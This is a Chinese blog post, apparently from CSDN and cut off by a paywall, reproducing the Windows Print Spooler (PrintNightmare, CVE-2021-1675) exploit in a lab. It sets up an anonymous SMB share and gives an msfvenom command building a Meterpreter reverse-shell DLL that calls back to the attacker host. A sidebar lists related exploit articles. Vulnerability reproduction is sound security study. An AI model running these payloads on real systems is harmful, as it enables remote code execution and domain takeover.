微软通杀漏洞-CVE-2021-1675复现

最新推荐文章于 2024-05-28 14:35:00 发布
原创 最新推荐文章于 2024-05-28 14:35:00 发布 · 524 阅读 · 2 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文详细介绍了复现微软漏洞CVE-2021-1675的过程,包括环境搭建、利用前提和遇到的五个坑点。在环境部分,提到了受害机(window2019)和攻击机(kali)的IP地址。利用前提需要一个普通域用户以及开启Spooler服务。在复现过程中,作者遇到了SMB匿名登录问题、DLL路径不匹配、权限不足、账号限制以及漏洞利用后服务自动关闭的问题。文章适合对网络安全和漏洞复现感兴趣的读者。

环境

受害机:window2019(192.168.153.133)
攻击机:kali(192.168.153.134)

利用前提

或许需要:SeImpersonatePrivilege或SeAssignPrimaryTokenPrivilege权限
一定需要:一个普通的域用户
一定需要:开启Spooler服务
在这里插入图片描述

环境搭建

安装impacket

git clone https://github.com/cube0x0/impacket
cd impacket
python3 ./setup.py install

下配置smb服务
vim /etc/samba/smb.conf

[global]
map to guest = Bad User
server role = standalone server
usershare allow guests = yes
idmap config * : backend = tdb
smb ports = 445

[smb]
comment = Samba
path = /tmp/
guest ok = yes
read only = no
browsable = yes

sudo service smbd start
生成dll和启动msf

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.153.134 LPORT=4444 -f dll -o /tmp/rever.dll
msfconsole
use exploit/multi/handler
最低0.47元/天 解锁文章
Gamma_lab
关注
CVE-2021-1675 Windows Print Spooler权限提升漏洞复现
m0_56642842的博客
07-26 3498
0x00 简介 微软6月发布的安全更新补丁中包括了一个Windows Print Spooler权限提升漏洞漏洞CVE编号:CVE-2021-1675。未经身份验证的远程攻击者可利用该漏洞以SYSTEM权限在域控制器上执行任意代码,从而获得整个域的控制权。建议受影响用户及时更新漏洞补丁进行防护,做好资产自查以及预防工作,以免遭受黑客攻击。 0x01 漏洞概述 Print Spooler是Windows系统中管理打印相关事务的服务,用于管理所有本地和网络打印队列并控制所有打印工作。Windows系统默认开启
〖EXP〗Ladon打印机漏洞提权CVE-2021-1675复现
K8哥哥
07-11 2587
基本情况 6月9日,微软发布6月安全更新补丁,修复了50个安全漏洞,其中包括一个Windows Print Spooler权限提升漏洞漏洞CVE编号:CVE-2021-1675。未经身份验证的远程攻击者可利用该漏洞以SYSTEM权限在域控制器上执行任意代码,从而获得整个域的控制权。建议受影响用户及时更新漏洞补丁进行防护,做好资产自查以及预防工作,以免遭受黑客攻击。 漏洞描述 Print Spooler是Windows系统中用于管理打印相关事务的服务。 该漏洞在域环境中合适的条件下,无需任何用户交互,未经身
Douphp cms通杀漏洞(小宇特详解)
小宇的web博客
11-15 6004
Douphpcms通杀漏洞 老规矩在分析cms漏洞时,先在本机上安装cms,来进行代码审计。 这个通杀漏洞的原理就是通过找到data文件中的unlink文件进行删除,然后进行重新安装这个站点,然后我们对他进行恶意的传参,然后我拿到这个站点的webshell。 这个靶场是通过cms进行搭建的,我们事先在本地搭建一个 安装成功过后我们进行代码审计然后我们进行全局变量搜索,搜索函数unlink. 然后查找我们可以进行控制的地方,即控制它的传参变量 我们再这里找到了sql_filename这个变量,进去查看
cve-2021-1675复现
Shanfenglan's blog
07-08 2126
文章目录1. 参考文章2. 环境配置2.1 samba配置2.2 特殊的impacket配置3. 漏洞复现3.1 使用msf生成恶意dll并开启监听3.2 上传恶意dll到共享文件夹内3.3 使用exp进行利用4. 利用成果: 1. 参考文章 CentOS7搭建Samba共享文件夹 设置无密码登录 exp: cube0x0/CVE-2021-1675 2. 环境配置 2.1 samba配置 需要有一台linux机器,配置可无密码访问的共享文件夹。 下载samba: apt-get install samba
CVE-2017-11882漏洞分析与利用
qq_36949907的博客
07-10 1890
(一次大作业,比较啰嗦 见谅) 漏洞介绍 2017年11月14号,微软推送了常规的安全更新,其中就包括CVE-2017-11882的安全更新,当时还引起了不小的关注,之后Github上也公布了许多POC及对应的漏洞利用程序。 仅仅从CVE-2017-11882的漏洞利用效果来看,它可以通杀Office 2003到Office 2016的所有版本,并且整个攻击环境的构建非常简单,效果又非常的好。例如,有些攻击效果会出现弹框、CPU飙高、发生异常等等,而这个漏洞的利用效果,堪称“无色无味”,即整个过程几.
红队专题-与维持隐匿Privilege Escalation
aming小老弟
10-27 2164
高权限不仅能对更多文件进行增删改查的操作,方便进一步收集主机系统中的敏感信息, system权限也可以提取内存中的密码Hash,为进一步的渗透提供更多信息。权限提升是从初始访问权限(通常是标准用户或应用程序帐户)一直提升到administrator, root甚至SYSTEM访问权限的艺术。常见技术或攻击手段来获得高权限帐户访问权限。用于检测和利用不同权限提升技术的手动方法,但会提到可以完成相同工作并节省您一些时间的自动化工具。 完美,它指向我们的有效负载。 使用net(也是默认安装的)启动此服务以获得
微软漏洞 Cve-2021-1675复现
weixin_42345596的博客
07-07 3305
受影响版本 Windows Server 2012 R2 (Server Core installation) Windows Server 2012 R2 Windows Server 2012 (Server Core installation) Windows Server 2012 Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation) Windows Ser
Windows Print Spooler远程代码执行漏洞复现CVE-2021-1675
yangbz123的博客
07-05 5889
目录漏洞概述漏洞复现一、PowerShell脚本实现本地提权二、Windows Print Spooler RCE域控MSF上线Cobalt Strike上线三、mimikatz武器化攻击漏洞防御参考链接 漏洞概述 Windows Print Spooler是Windows的打印机后台处理程序,广泛的应用于各种内网中,攻击者可以通过该漏洞绕过PfcAddPrinterDriver的安全验证,并在打印服务器中安装恶意的驱动程序。若攻击者所控制的用户在域中,则攻击者可以连接到DC中的Spooler服务,并利用该
通杀良精南方数据网软上传漏洞工具
02-16
具体漏洞文件路径要在源代码中修改![upfile_other.asp]上传木马文件记得加空格
下载程序最新通杀漏洞入侵工具.rar
04-05
下载程序最新通杀漏洞入侵工具.rar 下载程序最新通杀漏洞入侵工具.rar 下载程序最新通杀漏洞入侵工具.rar 下载程序最新通杀漏洞入侵工具.rar 下载程序最新通杀漏洞入侵工具.rar 下载程序最新通杀漏洞入侵工具.rar
【技术分享】cve-2021-1675-windows提权复现以及详细分析
weixin_45062925的博客
05-24 1369
1、漏洞描述 Windows Print Spooler是Windows的打印机后台处理程序,广泛的应用于各种内网中。近期安全研究人员在Github公布了Windows PrintSpooler远程代码执行漏洞POC。攻击者可以通过该漏洞绕过PfcAddPrinterDriver的安全验证,并在打印服务器中安装恶意的驱动程序,若攻击者所控制的用户在域中,则攻击者可以连接到DC中的Spooler服务,并利用该漏洞在DC中安装恶意的驱动程序,完整的控制整个域环境。 Github公布的地址...
Windows Print Spooler CVE-2021-1675 漏洞复现
p01son的博客
07-26 1037
Windows Print Spooler CVE-2021-1675 漏洞复现 Created: July 7, 2021 5:25 PM 漏洞描述 Windows Print Spooler是Windows的打印机后台处理程序,广泛的应用于各种内网中,攻击者可以通过该漏洞绕过PfcAddPrinterDriver的安全验证,并在打印服务器中安装恶意的驱动程序。若攻击者所控制的用户在域中,则攻击者可以连接到DC中的Spooler服务,并利用该漏洞在DC中安装恶意的驱动程序,完整的控制整个域环境。 利用条件
漏洞复现|PrintNightmare(CVE-2021-1675复现
weixin_42282189的博客
01-05 6359
作者: 飞天魔鬼 免责声明:本文仅供学习研究,严禁从事非法活动,任何后果由使用者本人负责。 0x01 简介 Windows Print Spooler是Windows的打印机后台处理程序,广泛的应用于各种内网中,攻击者可以通过该漏洞绕过PfcAddPrinterDriver的安全验证,并在打印服务器中安装恶意的驱动程序。若攻击者所控制的用户在域中,则攻击者可以连接到DC中的Spooler服务,并利用该漏洞在DC中安装恶意的驱动程序,完整的控制整个域环境。 环境准备 一个普通权限的域账户 目标开启.
漏洞情报 | Windows Print Spooler 远程代码执行漏洞CVE-2021-1675)POC公开
爱国小白帽
06-29 1874
​ 点击上方 订阅话题 第一时间了解漏洞威胁 0x01 漏洞描述 Windows Print Spooler是Windows的打印机后台处理程序,广泛的应用于各种内网中。 微软2021年6月的安全更新中修复了一处 Windows Print Spooler 远程代码执行漏洞CVE-2021-1675)。今天,360漏洞云监测到安全研究人员公布了该漏洞的POC。 该漏洞源于Windows Print Spooler未能正确地实施安全限制,攻击者可绕过RpcAddPrinterDriver的安全检查,在
syWebEditor的一个通杀漏洞
fengling132的专栏
04-20 591
直接访问 /syWebEditor/UpImg.asp?isBack=&fileType=gif|jpg|png|asa|asp|mdb|&obj=L_Img&UpPath=/a.asp;   上传a.jpg后,shell在根目录下,名为a.asp;a.jpg   试了几个,都能成功,应该是通杀的...
通杀漏洞!华为、TP_Link、360、小米等多款主流路由器沦陷
最新发布
互联网安全研究院
05-28 1474
因此,针对TCP的劫持攻击可以应用于多种场景。首先,攻击者发送伪造的TCP RST报文来清除受害者连接的路由器 NAT 映射,由于大多数路由器出于性能考虑而不会严格检查TCP报文的序列号,然而,这也引入了严重的安全漏洞。目前,已有七家路由器供应商( TP-Link、华为、小米、360、Mercury、Ubiquiti 、Linksys)都已承认该漏洞,并正在尝试修复他们的产品。路由器作为连接智能设备和互联网的桥梁,承担着数据来往的主要任务,如果遭到黑客的攻击,企业和个人的数据安全问题就无法保障。
Tiki组件漏洞复现CVE-2020-15906和CVE-2021-26119研究
通过上述知识点的详细阐述,我们对tiki组件的两个特定漏洞CVE-2020-15906和CVE-2021-26119有了全面的认识,以及如何在实际环境中复现这些漏洞和采取的防御措施有了深入的理解。安全研究者和系统管理员可以利用这些...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值